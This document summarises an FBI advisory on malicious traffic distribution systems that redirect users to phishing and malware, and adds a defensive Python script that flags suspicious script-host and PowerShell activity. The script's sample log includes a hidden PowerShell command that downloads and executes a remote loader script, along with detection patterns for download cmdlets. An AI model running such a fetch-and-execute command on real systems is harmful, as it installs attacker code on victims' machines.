FBI Warns of Cyber Threat Using Fake Websites to Steal Data

The FBI has issued a warning to Americans about a rising cyber threat that employs fraudulent websites and fake login pages to steal money, passwords, and personal information. In a new public advisory, the agency highlighted that cyber criminals are utilizing malicious traffic distribution systems (TDSs) to secretly redirect internet users to scam websites, phishing pages, and malware downloads. These systems can also help attackers bypass traditional firewall protections and gain access to victim networks. Criminals often lure users through fake advertisements, phishing emails, and compromised websites that initially appear legitimate.

How a Malicious Traffic Distribution System Works

Initiation of Redirection

Cyber criminals use various methods to drive users to a TDS, including social engineering techniques such as links in phishing emails, search engine optimization poisoning that promotes fraudulent advertisement links mimicking legitimate ones, or compromising legitimate websites by altering website code. Legitimate websites are vulnerable to compromise when using insecure passwords or outdated themes and plugins. Attackers gain unauthorized access by brute-forcing weak administrative passwords or exploiting vulnerabilities in outdated plugins. After gaining administrative access, they edit the website’s code to redirect visitors to a malicious TDS.

Redirection Bypasses Firewalls

Cyber criminals often use a TDS to bypass traditional firewall rules that would otherwise block connections to known malicious sites. The TDS routes the victim through a chain of intermediate nodes that hides the final malicious destination, making the redirection difficult to trace and block.


Filtering Website Visitors

Cyber criminals use a TDS to profile potential victims by collecting their IP address, operating system, location, device, and browser information. Based on this data, the TDS can determine whether a given payload is likely to work against that visitor and filter traffic accordingly. Attackers can identify users in regions they are not targeting and serve them harmless content instead, which helps them avoid detection by unintended visitors, including security researchers.

Exploitation of Users

Cyber criminals exploit website visitor devices at the end of the TDS redirection chain by delivering phishing pages, financial scams, and other malware. Sometimes, they use a TDS to gain access to a victim’s network, often through malware distribution. Access to victim accounts obtained via network access may be sold to other criminals, including ransomware groups.

Tips to Protect Yourself

The FBI recommends individuals take the following precautions to avoid being targeted by a malicious TDS:

  • Exercise caution when clicking on advertisements: Before clicking, check the URL to ensure the site is authentic. A malicious URL may resemble a legitimate one or be a subdomain of a legitimate domain.
  • Keep Software Updated: Regularly update website software, plugins, and themes to patch known vulnerabilities. Enable automatic updates for minor releases and plugins.
  • Use Security Plugins & Firewalls: Install reputable plugins that provide a Web Application Firewall (WAF) to block malicious traffic.
  • Harden Login Security: Enforce strong passwords for all users, implement Two-Factor Authentication (2FA), and limit login attempts to prevent brute-force attacks.
  • Avoid Unverified Developers: Only install third-party plugins and themes from reputable, verified developers and official repositories.

The FBI also recommends businesses take the following precautions:

  • Change Default File Associations: Consider changing the default file association for .js files so that double-clicking one no longer runs it, preventing users from executing malicious .js payloads delivered via a TDS.
  • Monitor Endpoints: Monitor endpoints for suspicious execution of wscript.exe, cscript.exe, and PowerShell scripts invoking web requests for suspicious files, especially .js, .ps1, or .svg files.
  • User Training and Awareness: Combat phishing and social engineering through user training and awareness.
  • Audit and Patch Web Hosting Administration: Frequently audit CMS admin, database, FTP, and web hosting accounts, using strong, unique passwords. Patch all CMS and third-party components.
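The "Monitor Endpoints" recommendation above can be turned into a simple triage rule over process-creation telemetry. The following is an added example, not tooling from the FBI advisory; it assumes a constructed `host=… image=… cmd=…` record format and a hand-picked list of PowerShell download cmdlets, and flags script hosts launching .js files and PowerShell fetching .js/.ps1/.svg content over the web.

```python
import re
from dataclasses import dataclass

# Process names the advisory calls out as worth monitoring.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell cmdlets and .NET calls that fetch content from a URL (assumed list).
WEB_FETCH = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer", re.I)
# A URL whose path ends in one of the payload extensions the advisory names.
PAYLOAD_URL = re.compile(r"https?://\S+?\.(js|ps1|svg)\b", re.I)
JS_FILE = re.compile(r"\S+\.js\b", re.I)
# Constructed record format assumed for this example: "host=H image=PATH cmd=REST".
RECORD = re.compile(r"host=(\S+)\s+image=(\S+)\s+cmd=(.*)$")

@dataclass
class Finding:
    host: str
    image: str
    reason: str

def triage(line: str):
    """Return a Finding for one process-creation record, or None if it looks benign."""
    m = RECORD.match(line)
    if m is None:
        return None
    host, image_path, cmd = m.groups()
    image = image_path.rsplit("\\", 1)[-1].lower()
    if image in SCRIPT_HOSTS and JS_FILE.search(cmd):
        return Finding(host, image, "script host executing .js file")
    if image in POWERSHELL and WEB_FETCH.search(cmd):
        url = PAYLOAD_URL.search(cmd)
        if url:  # a web request alone is common; also require a payload-type URL
            return Finding(host, image, f"PowerShell fetching .{url.group(1).lower()} over the web")
    return None

def triage_log(lines):
    return [f for f in map(triage, lines) if f is not None]

# Constructed sample records (hostnames, paths and URLs are invented).
SAMPLE_LOG = [
    r'host=WS-017 image=C:\Windows\System32\wscript.exe cmd="C:\Windows\System32\wscript.exe" C:\Users\alice\Downloads\invoice.js',
    r"host=WS-023 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://cdn.example.test/loader.ps1'))",
    r"host=WS-041 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -File C:\Scripts\backup.ps1",
    r"host=SRV-02 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -c Invoke-WebRequest https://intranet.example.test/status.html",
    r"host=WS-009 image=C:\Windows\System32\cscript.exe cmd=cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli",
]

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding)
```

The last three sample records are deliberately benign-looking (a local script, an intranet fetch, and a built-in .vbs tool) to show that requiring both a download primitive and a payload-type URL keeps the rule from firing on routine administration.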